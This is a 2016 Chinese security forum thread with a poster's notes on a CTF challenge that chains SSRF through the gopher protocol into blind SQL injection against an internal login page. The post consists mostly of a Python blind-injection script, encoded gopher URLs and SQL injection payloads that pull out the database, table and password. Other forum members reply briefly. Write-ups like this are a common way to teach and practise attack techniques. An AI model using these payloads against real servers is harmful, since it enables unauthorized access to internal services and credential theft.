查看: 18755|回复: 4

ssrf和gopher协议笔记

[复制链接]
  • TA的每日心情
    无聊
    2017-9-11 15:40
  • 签到天数: 425 天

    [LV.9]以坛为家II

    发表于 2016-11-16 11:41:30 | 显示全部楼层 |阅读模式
    看论坛没啥干货,就拿以前写的东西充个数吧。
    一个ctf题目

    十分明显,大概服务端那里就是用php获取你提交的url,然后服务器去访问。ssrf,先扫存活ip段。

    burp从1到254遍历一下就好了,发现.1这台机器也是开放的,166 也是。对166扫端口发现是80。
    [Python] 纯文本查看 复制代码
    #coding=utf-8
    #ssrf盲注脚本工具
    import requests
    import string
     
    chars = []
    def getchars():
    	global chars
    	chars = list(string.ascii_lowercase)
    	for i in range(0, 10):
    		chars.append(str(i))
    	chars += ['@', '_', '.', '-', '\\', '']
    	return chars
     
    def checklength():
    	for i in range(0,9):
    		req = requests.get('http://web5.08067.me//index.php?url=gopher%3a%2f%2f172.16.181.166%3a80%2f_POST+%2fadmin%2fwllmctf_login.php+HTTP%2f1.1%250d%250aHost%3a+172.16.181.166%250d%250aContent-Length%3a+75%250d%250aContent-Type%3a+application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3dadmin%27+and+(SELECT+length(database()))%3d'+ str(i) +'+and+%271%27%3d%271%26password%3d2333')
    		response = req.content
    		#print response
    		if 'error names' not in response:
    			#print response
    			print '数据库长度为' + str(i)
    			break
     
    def checkdatabase(dblength):
    	reslut = ''
    	for i in range(0,dblength):
    		for char in chars:
    			req = requests.get("/index.php?url=gopher%3a%2f%2f172.16.181.166%3a80%2f_POST+%2fadmin%2fwllmctf_login.php+HTTP%2f1.1%250d%250aHost%3a+172.16.181.166%250d%250aContent-Length%3a+80%250d%250aContent-Type%3a+application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3dadmin%27+and+(select+mid((database())%2c1%2c1))%3d%27"+ char +"%27+and+%271%27%3d%271%26password%3d2333")
    			response = req.content
    			print response
    			#print response
    			if 'error names' not in response:
    				#print response
    				reslut += char
    				print reslut
    				break
     
    def checkdata():
    	getchars()
    	reslut = ''
    	for i in range (1, 33):
    		for char in chars:
    			#print char
    			url = "http://web5.08067.me/index.php?url=gopher%3a%2f%2f172.16.181.166%3a80%2f_POST+%2fadmin%2fwllmctf_login.php+HTTP%2f1.1%250d%250aHost%3a+172.16.181.166%250d%250aContent-Length%3a+107%250d%250aContent-Type%3a+application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3dadmin%27+and+(select+mid(((select+password+from+ssrf+limit+0%2c1))%2c"+ str(i) +"%2c1))%3d%27"+ char +"%27+and+%271%27%3d%271%26password%3d2333"
    			req = requests.get(url)
    			response = req.content
    			#print response
    			if 'password error' in response:
    				reslut += char
    				print reslut
    				break
     
     
     
     
    if __name__ == '__main__':
    	checkdata()
    	#checklength()
    	#checkdatabase(8)


    gopher笔记

    某个登录 burp抓包

    对其抓post包
    POST /admin/wllmctf_login.php HTTP/1.1
    Host: 172.16.181.166
    Content-Length: 35
    Content-Type: application/x-www-form-urlencoded
    username=ss&password=xiaozhang123
    (去掉了一些ua头,cookie 之类的,为了简单)
    写构造gopher 把换行换成%0d%0a
    gopher://172.16.181.166:80/_POST/admin/wllmctf_login.php HTTP/1.1%0d%0aHost: 172.16.181.166%0d%0aContent-Length: 35%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ausername=admin&password=xiaozhang123



    随便写点东西,上传图片好麻烦。不想写了

    对了密码是注入出来的,盲注,先注入处表名,列名,在注入出内容,可以参考下面的payload来改写上面的py代码



    POST /wllmctf_login.php HTTP/1.1
    Host: 172.16.181.166
    User-Agent: curl/7.43.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 117
    log=admin&pwd=12345
    gopher://172.16.181.166:80/_POST /wllmctf_login.php HTTP/1.1%0d%0aHost: 172.16.181.166%0d%0aUser-Agent: curl/7.43.0%0d%0aAccept: */*%0d%0aAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3%0d%0aAccept-Encoding: gzip, deflate%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0aContent-Length: 117
    gopher%3A%2f%2f172.16.181.166%3A80%2f_%250aPOST%2520%2Fadmin%2fwllmctf_login.php%2520HTTP%252f1.1%250d%250aHost%253a%2520127.0.0.1%250d%250aContent-Length%253a%252035%250a%250aContent-Type%253A%2520application%252fx-www-form-urlencoded%250d%250a%250d%250ausername%253dss%2526password%253dxiaozhang123
    gopher%3a%2f%2f172.16.181.166%3a80%2f_%250aPOST%2520%2fadmin%2fwllmctf_login.php%2520HTTP%252f1.1%250d%250aHost%253a%2520127.0.0.1%250d%250aContent-Length%253a%252035%250d%250aContent-Type%%253a%2520application%252fx-www-form-urlencoded%250d%250a%250d%250ausername%3dss%26password%3dxiaozhang123
    gopher://172.16.181.166:80/_POST /admin/wllmctf_login.php HTTP/1.1%0d%0aHost: 172.16.181.166%0d%0aContent-Length: 52%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ausername=admin’xor sleep(20)#&password=xiaozhang123
    username=admin’and 1=1#&password=xiaozhang123
    username=admin’ and ‘1’=’1&password=xiaozhang123
    username=admin
    ‘ and (select LENGTH(database()))=4#
    username=admin’ and ‘1’=’1&password=xiaozhang123
    username=admin’ and ‘1’=’1&password=xiaozhang123
    username=admin’ and (SELECT length(database()))=4 and ‘1’=’1&password=2333
    username=admin’ and (SELECT length(database()))=4 and ‘1’=’1&password=2333
    &password=233
    database 长度为7
    username=admin’ and (SELECT length(database()))=4 and ‘1’=’1&password=2333
    database名字
    wllmctf
    username=admin’ and (select mid((database()),1,1))=’t’ and ‘1’=’1&password=2333
    table名字
    ssrf
    username=admin’ and (select mid(((select table_name from information_schema.tables where table_schema=database() limit 0,1)),1,1))=’m’ and ‘1’=’1&password=2333
    列名字
    username
    password
    username=admin’ and (select mid(((select column_name from information_schema.columns where table_name=0x73737266 limit 0,1)),1,1))=’m’ and ‘1’=’1&password=2333
    内容
    username=admin’ and (select mid(((select password from ssrf limit 0,1)),1,1))=’m’ and ‘1’=’1&password=2333
    回复

    使用道具 举报

  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2016-11-16 14:26:16 | 显示全部楼层
    说实话,我并没看懂你开头想要描述的是啥……
    最后看了你代码才明白   好特么尴尬

    点评

    笔记,所以比较随意  详情 回复 发表于 2016-11-16 15:23
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-9-11 15:40
  • 签到天数: 425 天

    [LV.9]以坛为家II

     楼主| 发表于 2016-11-16 15:23:22 | 显示全部楼层

    RE: ssrf和gopher协议笔记

    90_ 发表于 2016-11-16 14:26
    说实话,我并没看懂你开头想要描述的是啥……
    最后看了你代码才明白   好特么尴尬 ...

    笔记,所以比较随意
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2019-8-2 09:32
  • 签到天数: 227 天

    [LV.7]常住居民III

    发表于 2016-11-16 22:18:43 | 显示全部楼层
    望洋兴叹,努力追踪
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-8-21 09:22
  • 签到天数: 181 天

    [LV.7]常住居民III

    发表于 2016-11-21 10:32:35 | 显示全部楼层
    看了半天终于看明白了说的是啥
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 07:58 , Processed in 0.024273 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部